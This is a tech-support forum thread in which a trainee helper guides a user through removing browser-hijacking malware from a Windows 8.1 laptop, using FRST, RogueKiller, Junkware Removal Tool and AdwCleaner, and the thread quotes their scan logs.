2015-08-07 20:33 - 2015-08-07 20:33 - 00000000 ____D C:\Users\user\AppData\Local\GWX

2015-08-07 17:04 - 2015-08-31 13:51 - 00000000 ____D C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam

2015-08-07 16:51 - 2015-07-08 01:06 - 00058168 _____ (Windows ® Win 7 DDK provider) C:\Windows\system32\Drivers\gfilterdrv.sys

2015-08-07 16:47 - 2015-08-07 16:47 - 00000000 ____D C:\Users\user\AppData\Local\Steam

2015-08-07 16:47 - 2015-08-07 16:47 - 00000000 ____D C:\Users\user\AppData\Local\CEF

2015-08-07 12:47 - 2015-08-07 12:47 - 00000000 ____D C:\Users\user\AppData\Roaming\LaunchPad

2015-08-05 16:46 - 2015-08-05 16:46 - 00000000 ____D C:\Users\user\Downloads\Robert Jordan & Brandon Sanderson - Wheel of Time 14 - A Memory of Light (v4.0)

2015-08-05 16:24 - 2015-08-05 16:24 - 00000000 ____D C:\Users\user\AppData\Local\calibre-cache

2015-08-05 16:23 - 2015-08-05 16:54 - 00000000 ____D C:\Users\user\Documents\Calibre Library

2015-08-05 16:22 - 2015-08-05 16:24 - 00000000 ____D C:\Users\user\AppData\Roaming\calibre

2015-08-05 16:22 - 2015-08-05 16:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\calibre 64bit - E-book Management

2015-08-05 16:22 - 2015-08-05 16:22 - 00000000 ____D C:\Program Files\Calibre2

2015-08-05 15:13 - 2015-08-05 15:13 - 00000000 ____D C:\Users\user\AppData\Roaming\WinRAR

2015-08-05 13:56 - 2015-08-05 13:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-09-03 08:48 - 2015-07-17 00:03 - 00000000 ____D C:\Users\user\AppData\Roaming\uTorrent

2015-09-03 08:00 - 2013-08-23 01:36 - 00000000 ____D C:\Windows\system32\sru

2015-09-03 07:24 - 2013-08-23 01:36 - 00000000 ____D C:\Windows\LiveKernelReports

2015-09-03 07:22 - 2015-03-19 07:23 - 00003594 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-934653896-176862922-3437185597-1002

2015-09-03 07:19 - 2015-03-19 07:20 - 00000000 ____D C:\Users\user\Documents\Youcam

2015-09-03 07:18 - 2015-07-18 17:41 - 00000000 ____D C:\Program Files (x86)\Steam

2015-09-03 07:17 - 2015-07-16 18:48 - 00000000 ___DO C:\Users\user\OneDrive

2015-09-03 04:00 - 2013-08-23 00:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT

2015-09-03 02:11 - 2014-03-18 19:53 - 00956476 _____ C:\Windows\system32\PerfStringBackup.INI

2015-09-03 02:05 - 2015-03-19 06:41 - 00065536 _____ C:\Windows\system32\spu_storage.bin

2015-09-03 01:49 - 2015-07-16 18:36 - 00000000 ____D C:\Program Files (x86)\Google

2015-09-03 01:47 - 2015-07-16 18:33 - 00000000 ____D C:\Users\user\AppData\Local\Deployment

2015-09-03 00:34 - 2015-03-19 07:18 - 00003898 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{962FEC79-917D-4E82-BD62-17EA45F302FE}

2015-09-02 13:37 - 2015-07-18 18:59 - 00000000 ____D C:\Users\user\AppData\Roaming\vlc

2015-09-02 13:14 - 2015-07-16 18:35 - 00000000 ____D C:\Users\user\AppData\Local\Google

2015-09-01 00:31 - 2013-08-22 23:25 - 00262144 ___SH C:\Windows\system32\config\BBI

2015-08-31 13:57 - 2014-05-13 18:10 - 00000000 ____D C:\Program Files (x86)\WildGames

2015-08-31 13:53 - 2014-05-13 18:10 - 00000000 ____D C:\ProgramData\WildTangent

2015-08-31 13:53 - 2014-05-13 18:10 - 00000000 ____D C:\Program Files (x86)\WildTangent Games

2015-08-20 18:52 - 2013-08-23 01:36 - 00000000 ____D C:\Windows\rescache

2015-08-16 21:10 - 2013-08-23 01:20 - 00000000 ____D C:\Windows\CbsTemp

2015-08-16 21:09 - 2015-07-19 17:20 - 00220672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dplayx.dll

2015-08-16 21:09 - 2015-07-19 17:19 - 00046592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpwsockx.dll

2015-08-16 21:09 - 2015-07-19 17:10 - 00024576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpmodemx.dll

2015-08-16 21:09 - 2015-07-19 17:09 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dplaysvr.exe

2015-08-16 21:09 - 2013-08-22 21:22 - 00461312 _____ (Microsoft Corporation) C:\Windows\system32\dpnet.dll

2015-08-16 21:09 - 2013-08-22 21:22 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\dpnsvr.exe

2015-08-16 21:09 - 2013-08-22 21:17 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\dpnathlp.dll

2015-08-16 21:09 - 2013-08-22 21:17 - 00009216 _____ (Microsoft Corporation) C:\Windows\system32\dpnhupnp.dll

2015-08-16 21:09 - 2013-08-22 21:17 - 00009216 _____ (Microsoft Corporation) C:\Windows\system32\dpnhpast.dll

2015-08-16 21:09 - 2013-08-22 13:56 - 00377856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnet.dll

2015-08-16 21:09 - 2013-08-22 13:56 - 00033792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnsvr.exe

2015-08-16 21:09 - 2013-08-22 13:51 - 00059904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnathlp.dll

2015-08-16 21:09 - 2013-08-22 13:51 - 00009216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnhupnp.dll

2015-08-16 21:09 - 2013-08-22 13:51 - 00009216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnhpast.dll

2015-08-14 18:15 - 2015-07-10 16:02 - 00000000 __SHD C:\Users\user\AppData\Local\EmieUserList

2015-08-14 18:15 - 2015-07-10 16:02 - 00000000 __SHD C:\Users\user\AppData\Local\EmieSiteList

2015-08-11 13:39 - 2015-03-19 06:39 - 00000000 ____D C:\ProgramData\Package Cache

2015-08-10 16:25 - 2014-04-02 20:25 - 00000000 ____D C:\Windows\Panther

2015-08-05 13:47 - 2013-08-23 00:44 - 00383584 _____ C:\Windows\system32\FNTCACHE.DAT

==================== Files in the root of some directories =======

2015-09-03 01:07 - 2015-09-03 01:07 - 0453120 __RSH () C:\Users\user\AppData\Roaming\scrrunp.dll

2015-08-30 10:38 - 2015-08-30 10:38 - 0000464 ____H () C:\Users\user\AppData\Roaming\½ž’“Ó™œ‰

2015-08-30 10:39 - 2015-09-03 01:20 - 0000712 ____H () C:\ProgramData\@system.temp

2015-08-30 10:38 - 2015-09-03 01:20 - 0000448 ____H () C:\ProgramData\@system3.att

2015-07-19 15:22 - 2015-06-16 07:16 - 0076288 ___SH () C:\ProgramData\msbogj.exe

Files to move or delete:

====================

C:\ProgramData\msbogj.exe

Some files in TEMP:

====================

C:\Users\user\AppData\Local\Temp\Heroes_of_Might_and_Magic_3_Complete_PC_Free.exe

C:\Users\user\AppData\Local\Temp\KB166593328.exe

C:\Users\user\AppData\Local\Temp\KB289558421.exe

C:\Users\user\AppData\Local\Temp\KB41462734.exe

C:\Users\user\AppData\Local\Temp\KB543130078.exe

C:\Users\user\AppData\Local\Temp\linstocks.dll

C:\Users\user\AppData\Local\Temp\Plugin.exe

C:\Users\user\AppData\Local\Temp\sqlite3.dll

C:\Users\user\AppData\Local\Temp\update.exe

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed

C:\Windows\system32\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\system32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\system32\services.exe => File is digitally signed

C:\Windows\system32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\system32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\system32\rpcss.dll => File is digitally signed

C:\Windows\system32\dnsapi.dll => File is digitally signed

C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed

C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

Addition:

Additional scan result of Farbar Recovery Scan Tool (x64) Version:31-08-2015

Ran by user (2015-09-03 08:50:22)

Running from C:\Users\user\Downloads

Boot Mode: Normal

==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-934653896-176862922-3437185597-500 - Administrator - Disabled)

Guest (S-1-5-21-934653896-176862922-3437185597-501 - Limited - Disabled)

user (S-1-5-21-934653896-176862922-3437185597-1002 - Administrator - Enabled) => C:\Users\user

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Panda Free Antivirus (Enabled - Up to date) {AAF74A68-8713-CDF1-004F-30003398BE9E}

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AS: Panda Free Antivirus (Enabled - Up to date) {1196AB8C-A129-C27F-3AFF-0B72481FF423}

AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

FW: Panda Firewall (Disabled) {92CCCB4D-CD7C-CCA9-2B10-9935CD4BF9E5}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\uTorrent) (Version: 3.4.4.40911 - BitTorrent Inc.)

7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)

Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.4.144 - Adobe Systems, Inc.)

ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 8.1202.1711.102 - Alps Electric)

AMD Catalyst Install Manager (HKLM\...\{7536C341-2F7D-EFE6-F521-DEBE68B025C5}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)

calibre 64bit (HKLM\...\{D4DF4C08-5DCA-4664-8612-1A8511D6F8B4}) (Version: 2.33.0 - Kovid Goyal)

CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.5.6902 - CyberLink Corp.)

CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.5.3416 - CyberLink Corp.)

CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.3.3709 - CyberLink Corp.)

CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.3.3907 - CyberLink Corp.)

D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden

DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden

Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.85 - Google Inc.)

Google Update Helper (x32 Version: 1.3.28.13 - Google Inc.) Hidden

HP Documentation (HKLM-x32\...\{3BAA7681-EF42-4FEC-84FC-87BA815492A4}) (Version: 1.2.0.0 - Hewlett-Packard)

HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7372.4698 - Hewlett-Packard)

HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.11 - Hewlett-Packard)

HP System Event Utility (HKLM-x32\...\{C78E8F51-3EAD-4F0C-83F0-EF371075E0B4}) (Version: 1.0.10 - Hewlett-Packard Company)

HP Utility Center (HKLM\...\{891A1782-8B20-4403-8383-458962525926}) (Version: 2.3.4 - Hewlett-Packard Company)

HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)

Inst5675 (Version: 8.01.11 - Softex Inc.) Hidden

Inst5676 (Version: 8.01.11 - Softex Inc.) Hidden

Malwarebytes Anti-Malware version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)

Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)

Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)

Movie Maker (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden

OEM Application Profile (HKLM-x32\...\{315F1A48-D883-B234-7C79-15873574ACC1}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.)

OpenAL (HKLM-x32\...\OpenAL) (Version: - )

Panda Devices Agent (HKLM-x32\...\Panda Devices Agent) (Version: 1.03.04 - Panda Security)

Panda Devices Agent (x32 Version: 1.05.00 - Panda Security) Hidden

Panda Free Antivirus (HKLM-x32\...\Panda Universal Agent Endpoint) (Version: 15.01.00.0006 - Panda Security)

Panda Free Antivirus (Version: 7.84.00.0000 - Panda Security) Hidden

Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.232 - Qualcomm Atheros)

Qualcomm Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 10.0 - Qualcomm Atheros)

Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.29075 - Realtek Semiconductor Corp.)

Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 8.24.1218.2013 - Realtek)

Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7164 - Realtek Semiconductor Corp.)

Roads of Rome 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden

Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)

swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden

VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)

WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)

Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)

WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== Restore Points =========================

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 23:25 - 2013-08-22 23:25 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {1D1EFFDD-FFEF-41BA-8406-9E014220D816} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-03] (Google Inc.)

Task: {439E8759-4791-4EEA-A839-18CE850C33B7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-03] (Google Inc.)

Task: {5BAB93B1-05E8-4C35-ADE2-2CE61829406C} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2013-08-05] (CyberLink)

Task: {780563C7-45A1-45E2-85FF-2EAFA6B0AC61} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2013-03-13] (CyberLink Corp.)

Task: {B1EA828C-2A31-4235-AD2A-081FDBFFB3B7} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe [2014-03-07] (CyberLink Corp.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (Whitelisted) ==============

#2
Nevan

Posted 03 September 2015 - 03:10 AM

Trusted Helper

Malware Removal
1,765 posts

Hello, xander291190. Welcome to Geeks to Go! My nickname is Nevan and I will be helping you getting your system back on its electronic feet.

Before we get started, please keep these things in mind:

Always read every part of my post carefully. If you don't, you may do something wrong and there could be more problems to solve.
If your security programs give you any warnings when using tools I asked you to, don't be afraid. Every tool I provide to you is 100% safe.
Only run tools that I ask you to. Some of them can be dangerous to your system as they have much power.
You should save or print my instructions. It is possible that we will be using Safe mode, which will cut you off from your internet connection and without access to them, you might be stuck.
Malware removal is a complicated process that takes multiple steps to be completed. Don't give up, be patient.
The tools we are going to use and your software may cause unwanted interactions. Because of that, I recommend you to make backups of any important files from your machine before proceeding as they might be lost.
I recommend you to stay with me until I tell you that we are done. It is important because when your system does not show any bad symptoms anymore it does not mean that it is 100% clean.
Your time to reply is limited. If you don't reply within 3 days, your topic will be closed and you will have to request it to be reopened by contacting one of Moderator group members with the link to this topic.
Every program I ask you to download should be saved to and run from desktop. If you don't know how to choose the direction of where a download is saved, check this site. You can also just copy these programs to your desktop manually and then run them from there.
Remember that the fixes I give you are only for your machine. Using it on other systems may (and probably will) cause problems.
Finally, if you have any questions or are unsure about something, just ask. I will not blame you for it. It is better to ask rather than regret it later.

Also, please note that I'm currently in training, so my answers to you will have to be checked first by an experienced helper before I can post them. This can lengthen the time between my answers to you, but in return you will have an extra person reviewing your log.

It looks like the Addition.txt you've posted isn't complete. Can you please launch FRST again (make sure that Addition.txt is checked) and post the new logs?

Try attaching them to your post. It may be that the content is too big to fit in one post and that's why it's been cut.

#3
xander291190

Posted 03 September 2015 - 03:07 PM

Member

Topic Starter
Member
13 posts

Hi Nevan, thanks very much for helping me out!

I've run the scan again, i attached the documents this time so hopefully all the information will be there.

Attached Files

FRST.txt 31.25KB 254 downloads
Addition.txt 26.47KB 289 downloads

#4
Nevan

Posted 03 September 2015 - 04:07 PM

Trusted Helper

Malware Removal
1,765 posts

Hello again, xander291190.

A small thing first...

P2P Warning

I've noticed that you have or have had a P2P (Peer-to-Peer) file sharing program on your machine:

µTorrent

It is important to stay away from them as they are used to share pirated material. The programs themselves can be safe, but majority of the files shared through them is infected.

Some of things to keep in mind when using P2P programs:

Your computer is more likely to get infected with malware, which will result in coming back to our or other forums for help.
You may have your important data stolen, including passwords, photos or personal information.
You help to share pirated material, which may result in arrest, fines, or even jail time for illegal downloads of copyrighted material.

If I still didn't convince you, please read these short reports about how dangerous it can be to use P2P programs:

Whether you remove them or not is your decision. Though I strongly recommend you to uninstall your P2P programs as they most likely will cause problems in the future.

If you choose not to remove them, please refrain from using them until we are done on cleaning your computer.

Let's begin the cleaning. Please tell me if this helps with your problem.

Step #1

FRST Fix

Download attached fixlist.txt file to your desktop.
fixlist.txt 2.53KB 263 downloads
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
Right click FRST64.exe on your desktop and click Run as administrator.
Press the Fix button just once and wait.
NOTE: It's important that both FRST64.exe and fixlist.txt are in the same location or the fix will not work.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished, FRST will generate a log on the desktop (Fixlog.txt). Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.

Step #2

RogueKiller

Download RogueKiller to your desktop. Make sure to choose RogueKillerX64.exe.

Quit all running programs
Right click RogueKillerX64.exe and click Run as administrator
The program will start the prescan once it's launched. Please wait until it's done and click Scan button.
Once the scanning is done, "Scan finished. Please look at the different tabs and check/uncheck needed items before pressing the delete button" message will appear. When it happens, click Report button. The scan log will open.
Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.

Step #3

Farbar Service Scanner

Download FSS.exe to your desktop.
Right click FSS.exe on your desktop and click Run as administrator.
Make sure that all options are checked and click Scan
It will create a log (FSS.txt) on the Desktop.
Double click FSS.txt. Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply

Things that should appear in your next post:

Fixlog.txt log content
RogueKiller log content
FSS.txt log content
Does that problem with Chrome still appear?

#5
xander291190

Posted 04 September 2015 - 07:57 PM

Member

Topic Starter
Member
13 posts

Hi again Nevan,

Apologies it's taking me a bit of time to get the info you asked for. The virus is taking up a lot of my computers processing speed, so completing the scans without it crashing has been an issue, nearly done now though.

Just noticed reading through your advice again, that you mentioned letting you know if there were any further symptoms during the fixing process, a couple have appeared.

Firstly it's not just Chrome that is doing it now, Internet Explorer is doing almost exactly the same thing, though it's process' have a different name.

Also my chrome now doesn't work at all, and even when i don't try to use it frequently an error message appears. It shows as:

'The instruction at 0x08d236b0 referenced at memory 0x000aaea. The memory could not be read. Click OK to terminate the program'

I'll have the files uploaded for you shortly, just thought i'd let you know whilst i was waiting for the scan to finish.

#6
xander291190

Posted 04 September 2015 - 08:25 PM

Member

Topic Starter
Member
13 posts

Hello once more Nevan,

Following on form my previous post a little while ago, I've finished the scans that you asked for. I had to attach them as .txt documents instead of copying and pasting them, my computer was having an issue pasting the information, I hope that's alright, sorry for the inconvenience.

Good news, the issue seems to have cleared up! Brilliant result!

Also i deleted utorrent like you recommended, I reckon that's how the virus got in, so i'll be steering clear of that from now on.

Just wanted to say I really appreciate your help mate, this was really stressing me out as i'm off travelling with the laptop very soon and needed it sorted. But you were quick to reply and the help you provided was easy to understand and worked perfectly, so thank you very much!

Is there anything else you need from me or need me to do?

Attached Files

Fixlog.txt 10.35KB 238 downloads
RogueKiller.txt 3.65KB 237 downloads
FSS.txt 3.45KB 227 downloads

#7
Nevan

Posted 05 September 2015 - 06:18 AM

Trusted Helper

Malware Removal
1,765 posts

Hello again, xander291190.

I'm glad to hear that the problem is gone. However, we still have some cleaning to do so please stay with me until I tell you that we're done

Perform the following instructions.

Step #1

Windows Repair (All-in-One) Portable

Download Windows Repair (All-in-One) Portable to your Desktop and unpack it. (right click the file and click Extract All, then click Extract). A folder named Tweaking.com - Windows Repair will appear.
Locate and double-click Repair_Windows.exe to run the program.
Click on Repairs tab, untick Automatically do a registry backup and then click Open Repairs.
A new window will open with the default options checked. Click the Unselect All button at the bottom of the window. All check marks from all the boxes will disappear.
Check the boxes next to the following options:
- 03 - Reset Service Permissions
- 06 - Repair Windows Firewall
- 17 - Repair Windows Updates
- 26 - Restore Important Windows Services
- 27 - Set Windows Services To Default Startup
Also, check Restart/Shutdown System When Finished and Restart System.
Click Start Repairs button.

Step #2

Junkware Removal Tool

Download Junkware Removal Tool to your Desktop
Close any open windows
Disable your Antivirus program (click here if you don't know how to do this)
Double click JRT.exe on your desktop to run it
Click any button to start the scan
Wait for Junkware Removal Tool to finish the scan
When the scan is finished, JRT.txt will be saved to your desktop and it will automatically open
Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.

Step #3

AdwCleaner

Close any open windows
Double click adwcleaner_5.005.exe you have in your Downloads folder to run it
Click the button
Wait for AdwCleaner to finish the scan
When the scan is finished, there will be "Pending. Please uncheck elements you don't want to remove" message. Leave everything as it is and click button.
When the cleaning is finished, the program will ask you to reboot the system. Please do so.
Once your machine has rebooted, a Notepad window will be opened. If it won't, you can find it in C:\AdwCleaner. The report will be saved as AdwCleaner[C2].txt.
Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.

Remember to enable your Antivirus program once you're done!

Also, please open the old AdwCleaner log file from C:\AdwCleaner\AdwCleaner[C1].txt and post it's content here.

Step #4

Farbar Service Scanner

Right click FSS.exe on your desktop and click Run as administrator.
Make sure that all options are checked and click Scan
It will create a log (FSS.txt) on the Desktop.
Double click FSS.txt. Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply

Things that should appear in your next post:

JRT.txt log content
AdwCleaner[C1].txt log content
AdwCleaner[C2].txt log content
FSS.txt log content

#8
xander291190

Posted 05 September 2015 - 11:56 AM

Member

Topic Starter
Member
13 posts

Hi,

No problem, I'll wait until you say it's all good

Here's the scan results:

JRT:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Junkware Removal Tool (JRT) by Malwarebytes

Version: 7.6.0 (08.31.2015:1)

OS: Windows 8.1 Connected x64

Ran by user on Sun 06/09/2015 at 2:32:29.90

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~ Services

~~~ Tasks

~~~ Registry Values

~~~ Registry Keys

~~~ Files

~~~ Folders

~~~ Chrome

[C:\Users\user\Appdata\Local\Google\Chrome\User Data\Default\Preferences] - default search provider reset

[C:\Users\user\Appdata\Local\Google\Chrome\User Data\Default\Preferences] - Extensions Deleted:

[C:\Users\user\Appdata\Local\Google\Chrome\User Data\Default\Secure Preferences] - default search provider reset

[C:\Users\user\Appdata\Local\Google\Chrome\User Data\Default\Secure Preferences] - Extensions Deleted:

[]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Scan was completed on Sun 06/09/2015 at 2:38:15.71

End of JRT log

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ADWCleaner C1:

# AdwCleaner v5.005 - Logfile created 03/09/2015 at 02:04:40

# Updated 31/08/2015 by Xplode

# Database : 2015-08-31.2 [Server]

# Operating system : Windows 8.1 Connected (x64)

# Username : user - HP

# Running from : C:\Users\user\Downloads\adwcleaner_5.005.exe

# Option : Cleaning

# Support : http://toolslib.net/forum

***** [ Services ] *****

***** [ Folders ] *****

[-] Folder Deleted : C:\Program Files (x86)\GSafe

[-] Folder Deleted : C:\Users\user\AppData\Local\Temp\GSafe

***** [ Files ] *****

***** [ Shortcuts ] *****

***** [ Scheduled tasks ] *****

***** [ Registry ] *****

***** [ Web browsers ] *****

[-] [C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : vlc-media-player.en.softonic.com

*************************

:: Winsock settings cleared

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [855 bytes] ##########

ADWCleaner C2:

# AdwCleaner v5.005 - Logfile created 06/09/2015 at 03:37:33

# Updated 31/08/2015 by Xplode

# Database : 2015-09-04.4 [Server]

# Operating system : Windows 8.1 Connected (x64)

# Username : user - HP

# Running from : C:\Users\user\Downloads\adwcleaner_5.005.exe

# Option : Cleaning

# Support : http://toolslib.net/forum

***** [ Services ] *****

***** [ Folders ] *****

***** [ Files ] *****

***** [ Shortcuts ] *****

***** [ Scheduled tasks ] *****

***** [ Registry ] *****

***** [ Web browsers ] *****

*************************

:: Winsock settings cleared

########## EOF - C:\AdwCleaner\AdwCleaner[C2].txt - [606 bytes] ##########

FSS:

Farbar Service Scanner Version: 26-07-2015

Ran by user (administrator) on 06-09-2015 at 03:53:25

